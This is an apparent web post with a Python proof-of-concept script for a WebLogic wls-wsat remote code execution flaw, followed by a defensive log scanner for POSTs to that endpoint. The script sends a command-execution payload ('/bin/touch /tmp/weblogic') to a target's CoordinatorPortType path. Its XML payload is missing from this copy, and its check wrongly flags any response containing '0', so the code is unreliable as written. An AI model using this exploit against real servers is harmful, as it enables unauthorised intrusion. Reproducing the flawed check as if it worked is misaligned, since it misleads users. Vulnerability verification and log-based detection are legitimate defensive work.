poc weblogic exploit: Weblogic wls RCE vulnerability verification PoC

```python
#!/usr/bin/env python
# coding: utf-8
# @Date   : 2017/12/22 17:11
# @File   : weblogic_poc.py
# @Author : sevck
# @Link   : http://www.qingteng.cn
# -------------------------------------------------------------------------

import re
from sys import argv

import requests

heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8',
}


def poc(url):
    # Accept "host:port" as well as a full URL.
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    # The XML markup of the request body is missing from this copy of the page;
    # only the text below survives.
    post_str = '''

/bin/touch

/tmp/weblogic

'''
    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        # The element name in this pattern is missing from the page; the SOAP
        # fault element <faultstring> is assumed here.
        response = re.search(r"<faultstring>.*</faultstring>", response).group(0)
    except Exception as e:
        # Connection errors and responses without a match both end up here.
        response = ""
    if 'java.lang.ProcessBuilder' in response or "0" in response:
        result = "Vulnerability"
        return result
    else:
        result = "No Vulnerability"
        return result


if __name__ == '__main__':
    if len(argv) == 1:
        print("python weblogic_poc.py url:port")
        exit(0)
    else:
        url = argv[1]
        result = poc(url=url)
        print(result)
```
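A defender-side companion, added here and not part of the original post: it scans web access logs for POST requests under the /wls-wsat/ path that the script above targets, normalising encoded or padded paths first. The combined log layout, the function names and the sample lines are assumptions constructed for this example, and matching the whole /wls-wsat/ prefix goes beyond the single CoordinatorPortType path in the script.

```python
import posixpath
import re
from urllib.parse import unquote

# Common/combined access-log layout (assumed; adapt to your proxy or server log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
WSAT_PREFIX = "/wls-wsat/"  # parent of the CoordinatorPortType path used by the script

SAMPLE_LOG = [  # constructed lines, documentation addresses only
    '198.51.100.7 - - [22/Dec/2017:17:11:02 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1432',
    '198.51.100.7 - - [22/Dec/2017:17:11:05 +0800] "POST /a/..%2fwls%2Dwsat//CoordinatorPortType HTTP/1.1" 500 1432',
    '203.0.113.9 - - [22/Dec/2017:17:12:40 +0800] "GET /wls-wsat/CoordinatorPortType HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Dec/2017:17:13:01 +0800] "POST /console/login/LoginForm.jsp HTTP/1.1" 302 0',
]


def normalise_path(target):
    """Drop the query, percent-decode once, collapse //, /./ and /../, lower-case."""
    path = unquote(target.split("?", 1)[0])
    # lstrip avoids normpath's special case that preserves exactly two leading slashes.
    return posixpath.normpath("/" + path.lstrip("/")).lower()


def find_wsat_posts(lines):
    """Return (client_ip, normalised_path, status) for every POST under /wls-wsat/."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue  # unparsable line, or not the method the script uses
        path = normalise_path(m.group("target"))
        # Lower-casing may over-match on case-sensitive servers; that errs towards review.
        if (path + "/").startswith(WSAT_PREFIX):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in find_wsat_posts(SAMPLE_LOG):
        print(hit)
```

Hits from hosts that have no reason to speak WS-AtomicTransaction to the server are the ones to triage first.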
